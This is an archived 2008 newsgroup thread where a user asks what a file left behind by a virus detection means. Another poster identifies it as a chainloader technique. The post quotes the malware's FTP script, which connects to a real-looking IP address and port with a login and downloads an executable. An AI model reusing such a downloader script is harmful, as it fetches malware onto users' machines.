Re: OT: q on virus
- From: Robert Baer <robertbaer@xxxxxxxxxxxx>
- Date: Sat, 07 Jun 2008 16:50:09 -0700
JosephKK wrote:
On Thu, 05 Jun 2008 18:43:04 -0700, Robert BaerYes; unpleasant is a useable term.
<robertbaer@xxxxxxxxxxxx> wrote:
When downloading a file, AVG complained, and i told it to "heal" the problem file which i could not find later.
File "i" found after AVG virus notification of infected
"wmsoft14674.exe" file; contained:
open 67.150.127.201 3832
user hlthmf hlthmf
get wmsoft14674.exe
quit
***** eof *****
Question: what does those lines mean and do?
What if i put 67.150.127.201 in my hosts file, would that help?
What is that 3832 mean?
Thanks.
Sounds like a frequently used chainloader technique. One of the
problems with it is that the actual target file is often many megs in
size. Virus or not, it is a damned unpleasant surprise for someone
trying to download a program, malevolent or not, with no warning.
This was the third time for me and i got curious.
.
- References:
- OT: q on virus
- From: Robert Baer
- Re: OT: q on virus
- From: JosephKK
- OT: q on virus
- Prev by Date: Re: OT: Next decade 'may see no warming'
- Next by Date: Re: OT : Arctic Ice returns
- Previous by thread: Re: OT: q on virus
- Next by thread: Paying at the Gas Pump
- Index(es):
Relevant Pages
|
